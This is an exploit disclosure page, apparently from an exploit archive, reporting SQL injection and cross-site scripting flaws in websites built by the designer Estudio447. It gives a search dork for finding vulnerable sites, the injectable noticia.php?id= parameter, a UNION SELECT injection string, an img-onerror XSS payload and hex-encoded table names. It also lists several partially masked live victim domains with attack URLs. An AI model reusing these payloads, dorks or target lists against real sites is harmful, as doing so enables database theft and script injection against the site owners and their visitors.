Estudio447 SQL Injection / Cross Site Scripting

2012.10.23
Credit: TAURUS OMAR
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 ========================================== 1 0 I'm Taurus Omar Member From Inj3ct0r TEAM 1 1 ========================================== 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 | | | Estudio447 - SQL Injection Vulnerability / Cross-Site Scripting | -------------------------------------------------------------------------- +----------------| ABOUT ME |--------------------+ NAME: TAURUS OMAR - HOME: ACCESOILEGAL.BLOGSPOT.COM - TWITTER: @taurusomar_ - E-MAIL: omar-taurus[at]dragonsecurity[dot]org - E-MAIL: omar-taurus[at]live[dot]com - PWNED: #ZUUU - +------------------------------------------------+ # Exploit Title: Estudio447 - SQL Injection Vulnerability / Cross-Site Scripting # Vendor Name: Estudio447 # Url Vendor: http://www.estudio447.com/ # Category: WebApps # Type: php # Risk: High # Dork: intext:"dise&#241;o web: estudio 447 # Exmaple/Sql=> http://site/noticias/noticia.php?id= [ Sql ] # Example/Xss=> http://site/noticias/noticia.php?id= [ Xss ] # Exploit/Comand/Sql=> +union+select+1,2,3,4--+ # Exploit/Comand/Xss=> "><img src=x onerror=alert("1337");> # table_schema=0x626464766761626F6761646F73 / table_name=0x6E6F746963696173 # Sample/Demo/Sql/Xss http://www.dvgabXXados.com/noticias/noticia.php?id=null%20null%20null%20null%20%%27 http://www.camXXgacedo.com/noticias/noticia.php?id=null%20null%20null%20null%20%%27 http://www.optXXXlizarra.com/noticias/noticia.php?id=null%20null%20null%20null%20%%27 http://www.breXXXdna.com/noticias/noticia.php?id=null%20null%20null%20null%20%%27 http://tienXXXeestella.com/noticias/noticia.php?id=null%20null%20null%20null%20%%27 # Info => Same Tables and Columns All Sites Vulnerability +--------------+ - galeria - - galeria_img - - noticias - - noticias_doc - - noticias_img - +--------------+

References:

http://www.estudio447.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top